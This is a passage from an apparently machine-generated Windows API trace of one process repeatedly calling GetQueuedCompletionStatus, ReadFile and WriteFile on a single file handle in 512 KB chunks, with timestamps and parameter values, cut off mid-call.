GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.187] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.188] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.188] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.198] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.199] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.200] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.201] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.218] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.220] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.221] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.221] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.222] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.224] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.225] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.225] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.248] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.250] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.251] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.251] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.252] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.254] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.255] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.255] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.267] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.269] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.270] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.270] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.272] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.282] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.283] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.283] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.293] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.295] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.296] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.296] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.298] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.299] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.300] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.300] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.310] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.312] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.313] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.313] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.314] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.316] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.317] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.317] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.365] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.367] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.368] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.368] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.370] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.371] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.372] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.372] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.382] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.384] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.385] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.385] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.403] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.405] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.406] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.406] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.431] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.432] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.434] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.434] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.443] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.445] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.447] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.447] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.465] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.466] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.467] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.467] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.469] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.470] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.472] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.472] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.495] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.497] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.498] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.498] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.500] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.501] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.502] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.502] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.521] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.522] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.524] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.524] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.525] GetQueuedCompletionStatus (in: 